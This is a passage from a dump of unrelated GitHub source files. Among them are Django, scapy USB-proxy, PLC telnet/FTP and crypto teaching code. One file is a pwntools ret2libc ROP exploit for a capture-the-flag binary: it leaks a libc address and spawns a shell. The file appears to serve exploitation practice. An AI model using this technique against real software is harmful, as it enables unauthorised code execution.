fresh_tomatoes.open_movies_page(movies)
# print (media.Movie.VALID_RATINGS)
# print(media.Movie.__doc__)
| [
"noreply@github.com"
] | noreply@github.com |
5493043be3c35aaaa1701498e246f4f8555ae5d7 | 8b2aeac35b73d03587251311fcd171e72a8fc854 | /photos/migrations/0002_auto_20180128_1207.py | 4b21b603c9fe41632188a38fc2948d97f3dcf7af | [] | no_license | mansonul/wedding | 78e273cf68b5897136c0b8ef18c664c3cfa505e2 | 3168faa79f1c223eb078e0e1941a2ddfeab903c4 | refs/heads/master | 2021-05-10T18:16:13.795886 | 2018-01-29T18:13:41 | 2018-01-29T18:13:41 | 118,626,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-28 12:07
from __future__ import unicode_literals
from django.db import migrations
import imagekit.models.fields
import photos.models
class Migration(migrations.Migration):
    """Auto-generated: make PhotoUpload.image optional (blank=True, null=True)."""

    dependencies = [
        ('photos', '0001_initial'),
    ]

    operations = [
        # Re-declare the image field so both forms and the database accept
        # a missing image; the upload path callable is unchanged.
        migrations.AlterField(
            model_name='photoupload',
            name='image',
            field=imagekit.models.fields.ProcessedImageField(blank=True, null=True, upload_to=photos.models.PhotoUpload.path_and_rename),
        ),
    ]
| [
"contact@dragosnicu.com"
] | contact@dragosnicu.com |
420ed41a7c05d90d86eec59a10c4788fd7143316 | 6fcd81ee329e404b8bcda2173092506663c3de93 | /Randompresent/exploit.py | 569112881b7dff1946f51dc33c8e993bf054bb00 | [] | no_license | not-duckie/RandomPwn | efe2aed9041bcd320cc75b14933aa508635e73a5 | e9a85b94239abf8ab49d03108a5c7a893d42bc3b | refs/heads/master | 2023-03-26T07:39:54.650384 | 2021-03-21T07:32:44 | 2021-03-21T07:32:44 | 195,807,065 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | #!/usr/bin/env python
from pwn import *
bin = ELF('./randompresent')
libc = ELF('./libc.so.6')
p = process('./randompresent')
#Stage 1 leaking
padding = "A"*40
put_plt = p64(bin.plt['puts'])
put_got = p64(bin.got['puts'])
pop_rdi = p64(0x0040077b)
main = p64(0x400676)
payload = padding + pop_rdi + put_got + put_plt + main
p.recvuntil('ROP me!')
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8,'\x00'))
lba = leak - libc.symbols['puts']
#Stage 2 exploitation
system = p64(lba + 0x449c0)
bin_sh = p64(lba + 0x181519)
payload = padding + pop_rdi + bin_sh + system
p.recvuntil('ROP me!')
p.sendline(payload)
p.interactive()
| [
"noreply@github.com"
] | noreply@github.com |
7b485e6c81c4efd3aac47646b1b61652249aa27d | f9b5a01d8cfeddc0c52fcbfc593fa0f31c4df1bf | /ex06/ex06.py | 6367fad5aff079d421fae75ad052baafeb043335 | [] | no_license | wogurdlek2/16PFA-2013211032 | 358154af14f65b7fd635dd9a682dd9ea22d7539e | 478616b3a090c596afba1b62f01152d468e0f014 | refs/heads/master | 2021-01-21T12:59:29.942224 | 2016-05-25T11:31:16 | 2016-05-25T11:31:16 | 53,999,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | x = "There are %d types of prople." % 10
binary = "binary"
do_not = "don't"
y = "Those who know %s and those who %s." % (binary, do_not)
print x
print y
print "I sais: %r." % x
print "I also said: '%s'." % y
hilarious = False
joke_evaluation = "Isn't that joke so funny?! %r"
print joke_evaluation % hilarious
w = "This is the left side of..."
e = "a string with a right side."
print w + e
| [
"CAD Client"
] | CAD Client |
bb42ad482fbb2350569ef7809947d727ac99b2f2 | 9ecfba7ed75b2869b09ec3e79c1f45dab21b9640 | /others/cropimage.py | 2583ee07c70b7822aad8ceca2237d18e83ee22a9 | [
"MIT"
] | permissive | pection/Scraper-website | ca7af593e421d4f09bfc280d6ec24e6562e0f6c3 | 77ed1df5103e1d8222a055c19acf5af255ffa4aa | refs/heads/master | 2022-12-25T15:51:46.958483 | 2020-10-07T13:58:40 | 2020-10-07T13:58:40 | 315,717,273 | 1 | 0 | MIT | 2020-11-24T18:18:42 | 2020-11-24T18:18:41 | null | UTF-8 | Python | false | false | 817 | py | import cv2
import os
import sys
import numpy as np
from PIL import Image
num = 1  # NOTE(review): unused
path = "//Users/pection/Documents/Crop/"

# Collect every .png file found anywhere under `path`.
filelist = []
for root, dirs, files in os.walk(path):
    for file in files:
        if(file.endswith(".png")):
            filelist.append(os.path.join(root,file))
print (filelist)

# Crop each image IN PLACE to the pixel region rows 40:450, cols 40:450
# (overwrites the original file).
for filename in filelist:
    img = cv2.imread(filename,-1)
    crop_img = img[40:450, 40:450]
    cv2.imwrite(filename,crop_img)
| [
"pection.naphat@gmail.com"
] | pection.naphat@gmail.com |
36f451d7368c519828e012b9099415a08a28f862 | 21f05b45dbb43667007f3063d1a33082e122bec6 | /src/NIMSU_Modules/Test/Test_SampFormCovariance.py | 120d527539a69407c1ca020478af5c1b8c85254a | [] | no_license | DanAyres/NIMSU | 6f328f4b98a5eb34277be347fa1a2bb331bd87f0 | 6fe378c73d25aa58951de75d50841864268d389b | refs/heads/master | 2020-05-02T11:18:06.087070 | 2015-05-27T09:27:17 | 2015-05-27T09:27:17 | 34,388,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,882 | py | '''
Created on 9 Feb 2015
@author: daniel
'''
import unittest
import numpy as np
from NIMSU_Modules.SampFormCovariance import Exponential_kernel, Calculate_Covariance_Matrix, Form_Covariance_Matrix, PosDef
from StringIO import StringIO
#import sys
class TestFormCovariance(unittest.TestCase):
def testExpoKernel(self):
N=3
l=0.1
a=np.zeros([N,N], float)
for i in range(N):
for j in range(i+1):
a[i,j] = np.exp( -np.fabs(i-j)/l )
if j!=i: a[j,i] = a[i,j]
b=Exponential_kernel(N, l)
self.assertTrue(np.allclose(a,b, rtol=1e-05, atol=1e-08))
def testCalcCov(self):
N=3
a=np.ones([N,N], float)
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
b=Calculate_Covariance_Matrix(a, Sigma, N)
for i in range(N):
for j in range(N):
a[i,j] = (i+1)*(j+1)
self.assertTrue(np.allclose(a,b, rtol=1e-05, atol=1e-08))
def testPosDef(self):
output=StringIO()
N=3
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
# Test reconstruction of covariance
kernel_args=0.1
Corr_Matrix=Exponential_kernel(N, kernel_args)
Covariance_Matrix=Calculate_Covariance_Matrix(Corr_Matrix, Sigma, N)
test_Matrix,flag=PosDef(Covariance_Matrix, N, output)
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
self.assertEqual(flag, False, "POSDEF negative eigenvalues")
# Test catch negative eigenvalues
N=2
Covariance_Matrix=np.zeros([N,N],float)
Covariance_Matrix[0,0] = 1;Covariance_Matrix[1,1]=1
Covariance_Matrix[0,1] = 2;Covariance_Matrix[1,0]=2
test_Matrix1,flag=PosDef(Covariance_Matrix, N, output)
test_Matrix=np.ones([N,N], float)
test_Matrix *=1.5
self.assertTrue(np.allclose(test_Matrix, test_Matrix1, rtol=1e-05, atol=1e-08))
self.assertEqual(flag, True, "POSDEF NO negative eigenvalues")
def testFormCovMat(self):
output=StringIO()
# depend==no
N=3
Corr_Matrix=np.zeros([N,N], float)
test_Matrix=np.zeros([N,N], float)
Sigma=np.zeros(N,float)
for i in range(N):
Sigma[i] = i+1
depend='no'
kernel='exponential'
kernel_args=0.1
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
for i in range(N):
test_Matrix[i,i] = Sigma[i]**2
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
# depend==yes
depend='yes'
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
self.assertTrue(np.allclose(Covariance_Matrix[:,0], Sigma**2, rtol=1e-05, atol=1e-08))
# Test bad kernel
Corr_Matrix=None
depend='corr'
kernel='dave'
self.assertRaises(ValueError, Form_Covariance_Matrix, Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
# Test expo kernel
test_Matrix = Exponential_kernel(N, kernel_args)
for i in range(N):
for j in range(N):
test_Matrix[i,j] *= Sigma[i]*Sigma[j]
kernel='exponential'
Covariance_Matrix=Form_Covariance_Matrix(Corr_Matrix, Sigma, N, depend, kernel, kernel_args, output)
self.assertTrue(np.allclose(Covariance_Matrix, test_Matrix, rtol=1e-05, atol=1e-08))
| [
"daiel@daiel-XPS-L421X"
] | daiel@daiel-XPS-L421X |
ffac71f012dd66130a8b66b3c02ceaca9515efd0 | ee8109057287ca39a83258e0b7be3bc2430f5dd3 | /usbq/usbq/usbmitm_proto.py | 66037a50f2167693ca16dea0b4195a4c90e02692 | [
"MIT"
] | permissive | bm16ton/usbq-usbq_core | 3153b7c049b6da0743ccbc51e28a1b461d99b2fb | c289f108fcf4f16ff72540d3301b432d830dfaa8 | refs/heads/master | 2023-08-15T20:08:22.558962 | 2021-10-22T03:29:51 | 2021-10-22T03:29:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,450 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.fields import ConditionalField
from scapy.fields import EnumField
from scapy.fields import LEIntField
from scapy.fields import LEShortField
from scapy.fields import LESignedIntField
from scapy.fields import PacketField
from scapy.fields import StrField
from scapy.fields import struct
from scapy.packet import Packet
from .defs import AutoDescEnum
from .defs import USBDefs
from .dissect.fields import TypePacketField
from .dissect.usb import ConfigurationDescriptor
from .dissect.usb import Descriptor
from .dissect.usb import DeviceDescriptor
from .dissect.usb import GetDescriptor
from .dissect.usb import URB
__all__ = [
'USBMessageHost',
'USBMessageDevice',
'ManagementMessage',
'ManagementReset',
'ManagementNewDevice',
'ManagementReload',
'USBMessageRequest',
'USBMessageResponse',
'USBAck',
]
class USBMitm(Packet):
    """Base class for all USBQ mitm protocol packets.

    NOTE(review): the indentation of this dump was lost; the enum classes
    below are reconstructed as NESTED classes because later code in this
    module references them as USBMitm.MitmType, USBMitm.ManagementType and
    USBMitm.USBSpeed.
    """

    def desc(self):
        # Default human-readable description: the packet's repr.
        return '%r' % (self,)

    class MitmType(AutoDescEnum):
        'USBQ Protocol Packet Type'

        # ubq_core/msg.h
        USB = 0
        ACK = 1
        MANAGEMENT = 2

    class ManagementType(AutoDescEnum):
        'USBQ Management Packet Type'

        # ubq_core/msg.h
        RESET = 0
        NEW_DEVICE = 1
        RELOAD = 2

    class USBSpeed(AutoDescEnum):
        'USBQ Device Speed'

        # kernel linux/usb/ch9.h
        LOW_SPEED = 1
        FULL_SPEED = 2
        HIGH_SPEED = 3

    class URBEPDirection(AutoDescEnum):
        '''
        URB EP direction

        From the Linux kernel's perspective the direction of the
        endpoint.
        '''

        # ubq_core/types.h
        URB_IN = 0
        URB_OUT = 1
class USBEp(USBMitm):
    """Endpoint header of a mitm message: number, transfer type and direction."""

    fields_desc = [
        LEShortField('epnum', 0),
        EnumField(
            'eptype', USBDefs.EP.TransferType.CTRL, USBDefs.EP.TransferType.desc, '<I'
        ),
        EnumField('epdir', USBDefs.EP.Direction.IN, USBDefs.EP.Direction.desc, '<I'),
    ]

    def extract_padding(self, s):
        # All remaining bytes belong to the parent packet, not this header.
        return '', s

    def is_ctrl_0(self):
        # True for the default control endpoint (EP0).
        return self.epnum == 0 and self.eptype == USBDefs.EP.TransferType.CTRL

    def is_interrupt(self):
        return self.eptype == USBDefs.EP.TransferType.INT
class USBAck(USBMitm):
    """Acknowledgement for a USB transfer: endpoint, status code and optional data."""

    fields_desc = [
        PacketField('ep', USBEp(), USBEp),
        LESignedIntField('status', 0),
        StrField('data', ''),
    ]

    def desc(self):
        return 'ACK %r' % (self.status,)
class USBMessageRequest(USBMitm):
    """Host-to-device USB request: a control URB on EP0, raw data otherwise."""

    fields_desc = [
        PacketField('ep', USBEp(), USBEp),
        # The URB field is only present for control transfers on endpoint 0.
        ConditionalField(
            PacketField('request', GetDescriptor(), URB), lambda p: p.ep.is_ctrl_0()
        ),
        StrField('data', ''),
    ]

    def get_usb_payload(self):
        # Control transfers carry a parsed URB; everything else is raw bytes.
        if self.ep.is_ctrl_0():
            return self.request
        return self.data

    def desc(self):
        s = []
        if self.ep.is_ctrl_0():
            s.append(self.request.desc())
        if len(self.data) > 0:
            s.append('+data (len:%u)' % (len(self.data)))
        return ' '.join(s)
class USBMessageResponse(USBMitm):
    """Device-to-host USB response, paired with the request that produced it."""

    fields_desc = [
        PacketField('ep', USBEp(), USBEp),
        # The original request is echoed for control transfers on EP0.
        ConditionalField(
            PacketField('request', GetDescriptor(), URB), lambda p: p.ep.is_ctrl_0()
        ),
        # A parsed descriptor is only present for GetDescriptor control requests.
        ConditionalField(
            PacketField('response', DeviceDescriptor(), Descriptor),
            lambda p: p.ep.is_ctrl_0() and type(p.request) is GetDescriptor,
        ),
        StrField('data', ''),
    ]

    def get_usb_payload(self):
        # GetDescriptor responses carry a parsed descriptor; otherwise raw bytes.
        if self.ep.is_ctrl_0() and type(self.request) is GetDescriptor:
            return self.response
        return self.data

    def desc(self):
        s = []
        if self.ep.is_ctrl_0() and type(self.request) is GetDescriptor:
            return self.response.desc()
        if len(self.data) > 0:
            s.append('+data (len:%u)' % (len(self.data)))
        return ' '.join(s)
class ManagementNewDevice(USBMitm):
    """Management payload announcing a newly attached device: speed + descriptors."""

    fields_desc = [
        EnumField('speed', USBMitm.USBSpeed.HIGH_SPEED, USBMitm.USBSpeed.desc, '<I'),
        PacketField('device', DeviceDescriptor(), DeviceDescriptor),
        PacketField(
            'configuration', ConfigurationDescriptor(), ConfigurationDescriptor
        ),
    ]

    def desc(self):
        return 'NewDevice'
class ManagementReset(USBMitm):
    """Empty management payload requesting a reset."""

    def desc(self):
        return 'Reset'
class ManagementReload(USBMitm):
    """Empty management payload requesting a reload."""

    def desc(self):
        return 'Reload'
class ManagementMessage(USBMitm):
    """USBQ management message: wraps a reset / new-device / reload payload."""

    fields_desc = [
        EnumField(
            'management_type',
            USBMitm.ManagementType.RESET,
            USBMitm.ManagementType.desc,
            '<I',
        ),
        # The payload class is selected by the management_type field.
        TypePacketField(
            'management_content',
            ManagementReset(),
            'management_type',
            {
                USBMitm.ManagementType.RESET: ManagementReset,
                USBMitm.ManagementType.NEW_DEVICE: ManagementNewDevice,
                USBMitm.ManagementType.RELOAD: ManagementReload,
            },
        ),
    ]  # FIXME: ManagementReset is empty, so if there is nothing to dissect, management_content will be the default value

    def post_build(self, p, pay):
        # If the type was not set explicitly, infer it from the payload class.
        # NOTE(review): the field is 4 bytes ('<I') but only the low 2 bytes are
        # rewritten here ('<H' + p[2:]); fine while values stay below 65536.
        if self.management_type is None:
            if isinstance(self.management_content, ManagementNewDevice):
                p = struct.pack('<H', USBMitm.ManagementType.NEW_DEVICE) + p[2:]
            elif isinstance(self.management_content, ManagementReload):
                p = struct.pack('<H', USBMitm.ManagementType.RELOAD) + p[2:]
            else:
                p = struct.pack('<H', USBMitm.ManagementType.RESET) + p[2:]
        return p + pay

    def desc(self):
        if self.management_type == USBMitm.ManagementType.RESET:
            return 'Reset'
        elif self.management_type == USBMitm.ManagementType.RELOAD:
            return 'Reload'
        else:
            return self.management_content.desc()
class USBMessage(USBMitm):
    """Shared behaviour for host/device messages: length prefix and type tests."""

    def is_management(self):
        # NOTE(review): magic numbers mirror MitmType (USB=0, ACK=1, MANAGEMENT=2).
        return self.type == 2

    def is_ack(self):
        return self.type == 1

    def is_usb_data(self):
        return self.type == 0

    def post_build(self, p, pay):
        # Fill in the 4-byte little-endian length prefix when it was left unset.
        if self.len is None:
            p = struct.pack('<I', len(p)) + p[4:]
        return p + pay

    def get_usb_payload(self):
        # Delegate to the typed content (request or response).
        return self.content.get_usb_payload()
class USBMessageDevice(USBMessage):
    'UDP packet payload from ubq_core bearing USB traffic from device->host.'

    name = 'USBMessageDevice'

    fields_desc = [
        LEIntField('len', None),
        EnumField('type', USBMitm.MitmType.USB, USBMitm.MitmType.desc, '<I'),
        # Content class selected by the type field: USB data / ACK / management.
        TypePacketField(
            'content',
            ManagementMessage(),
            'type',
            {0: USBMessageResponse, 1: USBAck, 2: ManagementMessage},
        ),
    ]

    def desc(self):
        return self.content.desc()
class USBMessageHost(USBMessage):
    'UDP packet payload from ubq_core bearing USB traffic from host->device.'

    name = 'USBMessageHost'

    fields_desc = [
        LEIntField('len', None),
        # NOTE(review): this uses ManagementType for the 'type' field while the
        # device side uses MitmType; the numeric values coincide (0/1/2) but the
        # enum labels shown in dissections will differ — likely unintended.
        EnumField(
            'type', USBMitm.ManagementType.RESET, USBMitm.ManagementType.desc, '<I'
        ),
        TypePacketField(
            'content',
            ManagementMessage(),
            'type',
            {0: USBMessageRequest, 1: USBAck, 2: ManagementMessage},
        ),
    ]

    def desc(self):
        return self.content.desc()
| [
"bm16ton@gmail.com"
] | bm16ton@gmail.com |
57d6937bf3629457efc49a2d6401c480d6dbdfa2 | 31021bb9d9788b132787f88db2dc8198a2686ba3 | /WorkThread.py | 9358e077ea039d629a8d9c83b74245bab20f405f | [] | no_license | yljtsgw/BootAssistant | f94846c58f6528c1c10d934be31dc9149854e9a3 | 5380d8436cdc0958ff2e344a516898dc75427355 | refs/heads/master | 2021-01-20T17:57:40.994834 | 2016-07-19T07:55:46 | 2016-07-19T07:55:46 | 63,671,555 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,810 | py | #!/usr/bin/env python
# coding:utf-8
"""
Author: --<>
Purpose:
Created: 2016/5/26
"""
from telnet import telnet
from ftp import ftpTool
from PyQt4.QtCore import QThread, pyqtSignal
import os
import config
import logging
logger_working = logging.getLogger('main.working')
########################################################################
class workThread(QThread):
    """Worker thread performing FTP/telnet maintenance tasks on a PLC.

    Emits sinOut1 with progress text and sinOut2 with the finished task type
    (a config.CON_* constant).
    """

    sinOut1 = pyqtSignal(str)
    sinOut2 = pyqtSignal(int)

    def __init__(self, parent=None):
        """Create an idle worker; call setup() with host/user/password before use."""
        super(workThread, self).__init__(parent)
        self.funcType = 1    # current task type (config.CON_* constant)
        self.lock = False    # True while a task is running
        self.tel = None      # telnet client, created in setup()
        self.ftp = None      # FTP client, created in setup()

    def setup(self, host, usr, psw):
        # Build the FTP and telnet clients for the given host credentials.
        self.ftp = ftpTool(host, usr, psw)
        self.tel = telnet(host, usr, psw)
def downloadFiles(self, remotedir, localdir):
    """Queue an asynchronous download of *remotedir* from the PLC into *localdir*."""
    if self.lock:
        self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
        return
    self.localdir = localdir
    self.remotedir = remotedir
    self.funcType = config.CON_DOWNLOAD
    self.lock = True
    self.start()
def uploadFiles(self,localdir,backupEnable):
    """Queue an asynchronous upload of *localdir*; back up first if *backupEnable*."""
    self.backupEnable = backupEnable
    if self.lock:
        self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
        return
    self.localdir = localdir
    self.funcType = config.CON_UPLOAD
    self.lock = True
    self.start()
def updatePlc(self,parambackupDelete):
    """Queue the PLC update task; *parambackupDelete* controls parameter-backup removal."""
    if self.lock:
        self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
        return
    self.parambackupDelete = parambackupDelete
    self.funcType = config.CON_UPDATE
    self.lock = True
    self.start()
def restartPlc(self):
    """Queue a PLC restart (sends 'cxsuspend' over telnet in run())."""
    if self.lock:
        self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
        return
    self.funcType = config.CON_RESTARTPLC
    self.lock = True
    self.start()
def cleanData(self):
    """Queue the Hard Disk 2 clean-up task."""
    print "print self.lock:", self.lock
    if self.lock:
        self.sinOut1.emit(u'有未完成任务正在进行,请稍后...' )
        return
    self.funcType = config.CON_CLEANDISK2
    self.lock = True
    self.start()
def run(self):
    """QThread entry point: dispatch on funcType, then release the lock and signal done."""
    try:
        if self.funcType == config.CON_DOWNLOAD:
            self.download()
        elif self.funcType == config.CON_UPLOAD:
            self.upload()
        elif self.funcType == config.CON_UPDATE:
            self.update()
        elif self.funcType == config.CON_RESTARTPLC:
            cmd = 'cxsuspend'
            self.sinOut1.emit(u'下发重启命令...' )
            self.runTelnetCmd(cmd)
            self.sinOut1.emit(u'已下发重启命令,请等待PLC重启...' )
        elif self.funcType == config.CON_KILLCERHOST:
            # Not implemented.
            pass
        elif self.funcType == config.CON_CLEANDISK2:
            self.clean()
    except Exception,e:
        logger_working.exception(str(e))
    finally:
        # Always release the lock and report which task finished.
        self.lock = False
        self.sinOut2.emit(self.funcType)
def runTelnetCmd(self,cmd):
    # Run a single command over telnet, connecting first if needed.
    # NOTE(review): telnetConnect is defined elsewhere in this class — confirm.
    if self.telnetConnect():
        self.tel.cmd(cmd)
def clean(self):
    """Wipe the data folders on Hard Disk 2, recreating any that are missing."""
    try:
        ret = self.ftpConnect()
        if not ret:
            return False
        # Folders to clear (if present) or recreate (if missing).
        nlist = ['celogger_data','SC','StatusCode','Tracelog']
        filelist = self.ftp.nlst()
        print filelist
        for files in nlist:
            logger_working.info("file: %s"%files)
            if files in filelist:
                logger_working.info("%s in %s"%(files,str(filelist)))
                self.sinOut1.emit(u'正在删除%s..'%files )
                self.ftp.clearDir(files)
            else:
                self.sinOut1.emit(u'正在重新创建%s..'%files )
                self.ftp.mkd(files)
        self.sinOut1.emit(u'清理Hard Disk2完成' )
    except Exception,e:
        logger_working.exception(str(e))
def download(self):
    """Stage the PLC's boot dir into a temp dir via telnet, then FTP each file down."""
    try:
        # Via telnet: copy the files from the boot dir into a temporary dir
        # so the FTP transfer reads a stable snapshot.
        ret = self.telnetConnect()
        if not ret:
            return False
        self.sinOut1.emit(u'在目标机删除临时目录下的文件')
        self.tel.delFiles(config.TEMPDIR)
        self.sinOut1.emit(u'在目标机创建临时目录')
        self.tel.mkDir(config.TEMPDIR)
        self.sinOut1.emit(u'将%s复制至%s' % (config.TARGETDIR, config.TEMPDIR))
        self.tel.copyFiles(config.TARGETDIR, config.TEMPDIR)
        if not self.ftpConnect():
            return
        # Mirror the remote directory name under the chosen local directory.
        remotedir = os.path.split(self.remotedir)[1]
        localdir = os.path.join(self.localdir, remotedir)
        if not os.path.isdir(localdir):
            self.sinOut1.emit(u'创建本地路径: %s' % localdir)
            os.makedirs(localdir)
        remotenames = self.ftp.getfileList(self.remotedir)
        self.sinOut1.emit(u'获取目标机文件列表')
        for item in remotenames:
            # Each entry is (size, name).
            filesize = int(item[0])
            filename = item[1]
            local = os.path.join(localdir, filename)
            local = local.replace('\\', '/')
            self.sinOut1.emit(u'>>>>正在下载文件:%s ....' % filename)
            ret = self.ftp.download_file(local, filename, filesize)
            if len(ret) > 0 :
                # A non-empty return value is an error/progress message.
                self.sinOut1.emit(ret)
            self.sinOut1.emit(u'%s 下载完成' % (filename))
        self.sinOut1.emit(u'全部文件下载完成,下载至:\n%s' % (localdir))
        self.ftp.cwd('..')
    except Exception, e:
        logger_working.exception(str(e))
    finally:
        self.lock = False
    def upload(self):
        """Optionally back up the target's boot directories, then FTP-upload the
        local folder into the target's update directory.

        Always clears self.lock on exit.
        NOTE(review): the bare ``return`` inside ``finally`` would also suppress
        any exception not caught above (e.g. KeyboardInterrupt).
        """
        try:
            # directories that make up a full on-device backup
            bootlist = ['Boot','CplusApplication','EventAnalyze','Parameter','Parameter_backup','ReportApplication']
            if not self.telnetConnect():
                return
            if self.backupEnable:
                self.sinOut1.emit(u'在目标机删除备份目录下的文件')
                self.tel.delFiles(config.BACKUPDIR)
                self.sinOut1.emit(u'在目标机创建备份目录')
                self.tel.mkDir(config.BACKUPDIR)
                self.tel.delFiles(config.BACKUPDIR)
                for filename in bootlist:
                    self.sinOut1.emit(u'在目标机创建备份目录%s文件夹'%filename)
                    # Windows-style path on the target; doubled backslashes survive telnet quoting
                    tfilename = '%s\\\\%s'%(config.BACKUPDIR,filename)
                    print tfilename
                    self.tel.mkDir(tfilename)
                    sfilename = r'%s\\%s'%(config.ROOTDIR,filename)
                    self.sinOut1.emit(u'将%s复制至%s'%(sfilename,tfilename) )
                    self.tel.copyFiles(sfilename, tfilename)
            # prepare a clean update directory on the target
            self.tel.delFiles(config.UPDATEDIR)
            self.tel.mkDir(config.UPDATEDIR)
            self.sinOut1.emit(u'在目标机创建升级目录')
            updateDir = os.path.split(config.UPDATEDIR)[1]
            #self.ftp.cwd(updateDir)
            #self.sinOut1.emit(u'转到目录: %s'%updateDir)
            self.sinOut1.emit(u'正在上传本地文件夹:%s'%self.localdir)
            if not self.ftpConnect():
                return
            self.uploadDir(self.localdir,updateDir)
            self.sinOut1.emit(u'全部文件上传完成,上传至%s'%(updateDir))
        except Exception ,e:
            logger_working.exception(str(e))
        finally:
            self.lock = False
            return
    def uploadDir(self,localdir,remotedir):
        """Recursively upload a local directory tree into the current FTP location.

        Changes into `remotedir`, uploads files, recurses into subdirectories
        (creating them remotely when missing) and changes back up one level.
        """
        try:
            if not os.path.isdir(localdir):
                return
            self.ftp.cwd(remotedir)
            for file in os.listdir(localdir):
                src = os.path.join(localdir, file)
                if os.path.isfile(src):
                    #file = unicode(file,'gbk')
                    logger_working.info(u'>>>>>>>正在上传文件:%s ...'%file)
                    self.ftp.uploadFile(src, file)
                elif os.path.isdir(src):
                    try:
                        self.sinOut1.emit(u'>>>>正在上传文件夹:%s ....' % file)
                        self.ftp.mkd(file)
                    except:
                        # mkd fails when the directory already exists; that's fine
                        logger_working.info('the dir is exists %s' % file)
                    self.uploadDir(src, file)
            logger_working.info( 'current ftp pwd:'+self.ftp.pwd())
            self.ftp.cwd('../')
        except Exception,e:
            logger_working.exception(str(e))
            logger_working.error(self.ftp.pwd())
        return
    def update(self):
        """Swap the previously uploaded update files into the target's root dir.

        Existing versions are moved to a temporary backup dir first; entries in
        the 'update' FTP listing containing a '.' are treated as single files,
        everything else as directories.  Requires both telnet and FTP.
        """
        try:
            if not self.telnetConnect():
                return
            if not self.ftpConnect():
                return
            updatedirList = self.ftp.nlst('update')
            self.sinOut1.emit(u'创建临时文件存放原BOOT文件')
            self.tel.delFiles(config.TEMPBDIR)
            self.tel.mkDir(config.TEMPBDIR)
            if self.parambackupDelete:
                # move the parameter backup dir out of the way as well
                pathDir = os.path.join(config.ROOTDIR, 'Parameter_backup')
                if self.tel.movePath(pathDir,config.TEMPBDIR):
                    self.sinOut1.emit(u'移动: %s 至%s'%(pathDir,config.TEMPBDIR))
            for pathName in updatedirList:
                isFile = False
                if '.' in pathName:
                    # plain file: copy straight into the root directory
                    isFile = True
                    pathDir = config.ROOTDIR
                else:
                    # directory: move the old version aside and recreate it empty
                    pathDir = os.path.join(config.ROOTDIR,pathName)
                    if self.tel.movePath(pathDir,config.TEMPBDIR):
                        self.sinOut1.emit(u'移动: %s 至%s'%(pathDir,config.TEMPBDIR))
                    self.tel.mkDir(pathDir)
                souseDir = os.path.join(config.UPDATEDIR,pathName)
                self.sinOut1.emit(u'复制: %s 至%s'%(souseDir,pathDir))
                if isFile:
                    self.tel.copyFile(souseDir,pathDir)
                else:
                    self.tel.copyFiles(souseDir,pathDir)
            self.sinOut1.emit(u'复制完成,请需启用BOOT,请重启PLC')
        except Exception,e:
            logger_working.exception(str(e))
def telnetConnect(self):
self.sinOut1.emit(u'正在telnet连接:%s'%self.tel.host)
if not self.tel.telnet_connect():
self.sinOut1.emit(u'启动TELNET连接失败,请确认配置文件中用户名密码正确')
return False
self.sinOut1.emit(u'启动TELNET连接成功')
return True
def ftpConnect(self):
self.sinOut1.emit(u'ftp连接:%s'%self.ftp.host )
if not self.ftp.connect():
self.sinOut1.emit(u'ftp连接失败,请确认配置文件中用户名密码正确')
return False
self.sinOut1.emit(u'ftp连接成功')
return True
    def __del__(self):
        """Best-effort teardown: close the telnet and FTP sessions, ignoring errors."""
        print '__del__ for thread'
        if self.tel != None:
            try:
                self.tel.close()
            except Exception,e:
                print e
            self.tel = None
        if self.ftp != None:
            try:
                self.ftp.quit()
            except Exception,e:
                print e
            self.ftp = None
if __name__ == '__main__':
host = '172.16.43.189'
usr = 'guest'
psw = '1'
| [
"393915549@qq.com"
] | 393915549@qq.com |
8a59b938196d4b7591563206ea27e0574a9c0ec2 | b251bb2eb3b91afd2c9641ffc0abf2b43475d920 | /Lecture notes/Notes 19 - Cryptography/RSA.py | 76a2de5b22624226818730673a7e42703f091db0 | [] | no_license | maverick19910614/COMP9021 | 912dc18ea9f3002febeaebc199f41ad2ce2418e2 | 25bccce7ae094f444d1221cc1fef6c3a7d278488 | refs/heads/main | 2023-04-22T20:14:49.887272 | 2021-05-13T08:20:17 | 2021-05-13T08:20:17 | 366,661,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,297 | py | # Written by Eric Martin for COMP9021
from math import gcd
from random import randrange
def diffie_hellman(p, g):
    """Demonstrate Diffie-Hellman key agreement with modulus p and base g.

    Both parties draw a private exponent below 100, exchange the public
    residues, and each derives the same shared secret.
    """
    print(f'Alice lets Bob know that p = {p} and g = {g}.')
    alice_secret = randrange(100)
    alice_public = g ** alice_secret % p
    bob_secret = randrange(100)
    bob_public = g ** bob_secret % p
    print(f'Alice sends {alice_public} to Bob.')
    print(f'Bob sends {bob_public} to Alice.')
    print(f'Alice computes the secret code as {bob_public ** alice_secret % p}.')
    print(f'Bob computes the secret code as {alice_public ** bob_secret % p}.')
def RSA(p, q):
    """Demonstrate textbook RSA encryption and decryption for primes p and q."""
    modulus = p * q
    totient = (p - 1) * (q - 1)
    public_exponent = 65537
    print(f'Alice publishes public key: N = {modulus}, e = {public_exponent}')
    # The private exponent is the inverse of e modulo phi(N); Bezout gives it.
    # It does not have to be smaller than phi(N), but it has to be positive.
